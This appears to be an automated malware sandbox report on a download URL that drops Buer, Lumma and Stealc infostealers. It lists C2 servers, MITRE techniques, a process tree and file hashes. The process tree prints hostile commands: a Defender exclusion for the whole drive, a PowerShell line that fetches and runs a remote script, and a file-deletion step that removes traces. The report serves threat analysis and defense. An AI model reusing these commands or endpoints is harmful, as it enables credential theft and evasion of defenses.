buer | hxxps://costweb3[.]com/download

Analysis

max time kernel
446s
max time network
447s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-08-2024 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://costweb3.com/download

Score

10^/10

buer lumma stealc mainteam credential_access defense_evasion discovery execution loader spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

mainteam

http://147.45.47.68

Attributes

url_path
/a8f961c72f0d877c.php

Extracted

Family

lumma

https://samledwwekspzxp.shop/api

https://writerospzm.shop/api

https://deallerospfosu.shop/api

https://bassizcellskz.shop/api

https://languagedscie.shop/api

https://complaintsipzzx.shop/api

https://quialitsuzoxm.shop/api

https://tenntysjuxmz.shop/api

Signatures

Buer
Buer is a new modular loader first seen in August 2019.
loader buer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
240	4220	powershell.exe
243	4220	powershell.exe
245	4220	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1760	powershell.exe
4220	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
5412	Install_x64.exe
2032	1.exe
5468	2.exe
984	3.exe

Loads dropped DLL 54 IoCs

pid	Process
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
5412	Install_x64.exe
4432	BitLockerToGo.exe
4432	BitLockerToGo.exe
5412	Install_x64.exe

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
242	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2032 set thread context of 4820	2032	1.exe	131
PID 5468 set thread context of 4432	5468	2.exe	132
PID 984 set thread context of 4380	984	3.exe	134

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\launcher289\3.exe	Install_x64.exe
File created	C:\Program Files\launcher289\1.exe	Install_x64.exe
File created	C:\Program Files\launcher289\2.exe	Install_x64.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\Install_x64.exe:Zone.Identifier	firefox.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Install_x64.exe:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
4432	BitLockerToGo.exe
4432	BitLockerToGo.exe
4432	BitLockerToGo.exe
4432	BitLockerToGo.exe
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	1760	powershell.exe
Token: SeDebugPrivilege	4548	firefox.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe
Token: SeDebugPrivilege	4172	whoami.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
4548	firefox.exe
5412	Install_x64.exe
4820	BitLockerToGo.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4120 wrote to memory of 4548	4120	firefox.exe	85
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 772	4548	firefox.exe	86
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87
PID 4548 wrote to memory of 1244	4548	firefox.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://costweb3.com/download"
1⤵
- Suspicious use of WriteProcessMemory
PID:4120
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://costweb3.com/download
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1812 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f645a2c6-83a5-48a8-ac8d-c0096164c3c1} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" gpu
    3⤵
    PID:772
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d8f064e-e7bc-4abd-aceb-593b73655bff} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" socket
    3⤵
    PID:1244
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2756 -childID 1 -isForBrowser -prefsHandle 3004 -prefMapHandle 1520 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 956 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a8a23dd-9ad1-4e60-b34c-30008162da39} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" tab
    3⤵
    PID:1820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3652 -childID 2 -isForBrowser -prefsHandle 3644 -prefMapHandle 2828 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 956 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87c5aeb9-afff-4412-bab9-584d8fc9ec94} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" tab
    3⤵
    PID:1072
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4656 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4712 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64416240-ab9f-4a2e-a686-725d7bc7ca58} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" utility
    3⤵
    - Checks processor information in registry
    PID:4504
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5328 -childID 3 -isForBrowser -prefsHandle 5340 -prefMapHandle 5336 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 956 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4289fbfc-8497-4138-bc81-1bebbf32be06} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" tab
    3⤵
    PID:4812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5476 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5488 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 956 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31f17ce1-c914-489d-91f6-d6df520827ef} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" tab
    3⤵
    PID:3720
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5780 -prefMapHandle 5776 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 956 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd06a50c-bd67-48aa-8da5-75d20d218fd7} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" tab
    3⤵
    PID:468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5348 -childID 6 -isForBrowser -prefsHandle 6124 -prefMapHandle 6112 -prefsLen 27174 -prefMapSize 244658 -jsInitHandle 956 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f57781e-b4e2-4b74-b973-52a8ea58e567} 4548 "\\.\pipe\gecko-crash-server-pipe.4548" tab
    3⤵
    PID:3248

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6108

C:\Users\Admin\Downloads\Install_x64.exe
"C:\Users\Admin\Downloads\Install_x64.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Program Files\launcher289\1.exe
  "C:\Program Files\launcher289\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2032
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4820
- C:\Program Files\launcher289\2.exe
  "C:\Program Files\launcher289\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5468
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4432
- C:\Program Files\launcher289\3.exe
  "C:\Program Files\launcher289\3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:984
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/42zzhcyga7s4bd9fnjp33ojb/raw" ) ) )
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4220
    - - C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups /fo csv
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4172
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\launcher289\1.exe

Filesize
25.7MB

MD5
a14de8ba8eead010accd5377bd5fb20a

SHA1
82c88a3844a6936926e080947740bf946923c97c

SHA256
bc454b4d63f9dffcfb92734728b54140484be498445c74bfa8ca9113dc990978

SHA512
10bc61e22d5ebd7d1c66170208d7c4e12a9bad801ee9d66441565fe08d597e6b8d36076d960673cb00cc22c6eecc592ce7b6e681a3365558b4e39464cea87335

Download Submit
C:\Program Files\launcher289\2.exe

Filesize
24.9MB

MD5
907a3ea234810e1d6e7984313a966110

SHA1
7dbff31f91881ee09a415dfcf1b40d4a3b03bb34

SHA256
14f949b0f59aff86c22d8a9bffceac2dbaf6f54ff9ffa9419474d85a8ad728ab

SHA512
22b47093878538642db185224413b5d948a28114ffe7a4f9b96b1f63d6076cb7a9354b8dabcb647dace08c393f0871b1f565ca9ca5f733d4862d6ece2c00bf33

Download Submit
C:\Program Files\launcher289\3.exe

Filesize
21.0MB

MD5
ff0ad7ba9725905e9de3f45737adfb4d

SHA1
1c303122b470248f2333eca0fe30e74f51238458

SHA256
433f241df24a5b41a5c818a0206f5f3cfdd57eda8fd4c7ecb3d0074ce8c7a7f4

SHA512
d904a28510956b5a48200847a8a694b5380467119ae147a263a829ebc3f05b6a16d7b4cd05893c5210eff9152cdb9e87d6e37924df721402db00a3cd21039b42

Download Submit
C:\ProgramData\AAAAAAAAAAAAAAAAAAAA

Filesize
12KB

MD5
c3eca89395921b4a05b1863901cc8360

SHA1
0a9eed382f8e82481ae3db84586ceca3b97d77bc

SHA256
3347a321415a344ba9fc14d410d230caaddb35769b1a9dd20a56961b26b847c5

SHA512
603b0300c88f615e5e0814451b8f43a925bcc65f10df29b9adb45a8b62fd446cb61064d229e578e1b739b9d28e8eb57f75111906153fede5ce4ee907a945b8e8

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\activity-stream.discovery_stream.json

Filesize
34KB

MD5
936c6ac17b5f9bddfb3bc23ae81e64a5

SHA1
be4ccc4ab8718ca507c9747cc1e5a8b053457892

SHA256
bc4c927241eb0d318b8ccb8372d916bb942cb2687354dfe0eee6289067e0c4cb

SHA512
d1b9f7d08cfd937c80ccafc27d453c47cf1519e1cefa05c6ab50d90a86c236e6c1bc8411d9fdbb3ab1bd5e00ec42b264bfbe46380abf7b7b5edfa62a2fe0258b

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\D3DCompiler_47_cor3.dll

Filesize
4.7MB

MD5
a7349236212b0e5cec2978f2cfa49a1a

SHA1
5abb08949162fd1985b89ffad40aaf5fc769017e

SHA256
a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082

SHA512
c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\DirectWriteForwarder.dll

Filesize
478KB

MD5
1407596ddb23ce07e5e70758c2904fab

SHA1
2a4cb379f297a1773d83397e2e145c6fd800e8db

SHA256
63f48d0a992616cd031b41ea7afd91007fd7a10ec7fb3369ce6cb7dc354e9942

SHA512
280af19972e07973ff3e9b066be86958bee73522c1ca6c1b1738a1b931f8b8df490311817efd7260988ab4ad89bf7553ffb528afead4aaeb98d066d3f22dffb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\Install_x64.dll

Filesize
90KB

MD5
c64f66c1db4b7d803c7335123594deb7

SHA1
0fc6d9b5ca02a2af89b5f2dc913885a9fe58cc7a

SHA256
0ed9cce1fcbc303859277b865253c4e7a466f8334312b8568146e40dac226d6d

SHA512
5543a2a6749b43410379707600d2179f55b7a98303707436ec3d66494f55bc7b713c51837e3700a33488d2bbd36b09c49dc5945fb8657564f9b8db6ce7df2dd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\Microsoft.Win32.Registry.dll

Filesize
126KB

MD5
f56b573f2160e505aa07d65d5bda44ed

SHA1
975df6b88f6524782cffc34a3863e96cac75a3cb

SHA256
a7ff9a52d21b172411c40f6441b59204ed629ccdf4db4603413d6c2c227d326d

SHA512
fb2efa4c53ca6b8304b850506a512637d9da7de3a5f4dbf4a86d441f181f023af0c6d150d16655eb9222ec29713eae3bdc02d2c24f1a283741884566e21d0a3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\PresentationCore.dll

Filesize
8.2MB

MD5
f284398a24062628e557fc5ea47bf5d1

SHA1
d3978bbb93cd05328c9fe8fd8662dbab5353ea1d

SHA256
41b6b8326d45af4941dbb08bfdc266515514553b1977324203dd1e526250d704

SHA512
8dd34ff84e141ac279e0835b38e6575028591e76790629ffde4c838d15973bc05c57da1c545a4fd42560ad8f6ebe3059364ed43c2fc6496d1559755314aec4c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\PresentationFramework-SystemXml.dll

Filesize
34KB

MD5
7d5528bbcc4f599df1112611204c54f6

SHA1
972e15edcf900776f50ad431105e908f0a13ae0f

SHA256
361ac611156192e9f77b7bd9e38baabceeb37acf0d3865c58484f43c2df32ca0

SHA512
139dd8f52a1320709fdc3bf30b8a0701aa276864540769228c29b965966b9a9f7aa467b045d01940f1b56c24c013795f72e21002d664526d8b2444783c4934de

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Install_x64\rKYgSdvy9UHfBv+ta1MV64VPlY6aDjQ=\PresentationFramework.Aero2.dll

Filesize
450KB

MD5
e4ee2cff564ce8463001486bcfb29c93

SHA1
